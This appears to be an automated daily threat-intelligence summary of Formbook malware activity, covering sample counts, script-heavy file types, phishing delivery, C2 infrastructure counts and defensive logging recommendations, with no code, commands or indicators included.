Daily Summary
Formbook activity remains stable with 37 new samples recorded, slightly above the 7-day average of 33 (+12%). This marginal increase is consistent with the family’s typical low-variance operational tempo, with no sudden surges or drops indicating a campaign launch or shutdown.
New Samples Detected
Script-based payloads dominate today’s batch, with PowerShell (.ps1) accounting for 38% of samples and JavaScript (.js) for 24%. This continues a recent shift away from binary executables toward living-off-the-land delivery. Notable is a single sample with the unusual extension .32783286, likely a renamed or obfuscated archive. The mix of .vbe (4), .vbs (3), and .dll (2) suggests multi-stage infection chains rather than direct execution.
Distribution Methods
File type patterns indicate phishing email attachments remain the primary vector. The high proportion of .ps1 files points to campaigns that use macro-enabled documents or embedded scripts to download and execute PowerShell stagers. An archive-only sample (.7z) may represent a zipped script bundle, potentially password-protected to evade email gateways.
Detection Rate
Current variants appear to be widely detected by major AV engines, given the stable sample count and prevalence of well-known script loaders. However, the presence of a custom-extension binary and polymorphic .vbe/VBS scripts suggests some samples may still bypass signature-based detection during initial stages. Analysts should monitor behavioral detections for script execution chains.
C2 Infrastructure
55 new C2 servers and 92 fresh IOCs were identified today, a high volume relative to only 37 samples. This indicates either rapid infrastructure rotation or multiple concurrent campaigns sharing backend nodes. No geographic concentration is evident yet; continued monitoring of newly generated domains is recommended.
7-Day Trend
Activity is steady over the past week, with daily volumes oscillating within a narrow band. The 12% deviation from the average is not statistically significant, suggesting no active expansion or contraction of Formbook operations.
Security Analysis
A non-obvious observation is the absence of .exe samples dominance despite the family’s historical preference for compiled executables. Today’s script-heavy distribution may indicate an evolution toward fileless techniques to bypass application whitelisting. Actionable recommendation: Enable PowerShell logging and script block logging on endpoints, and implement AMSI (Anti-Malware Scan Interface) to intercept these loaders at the execution layer.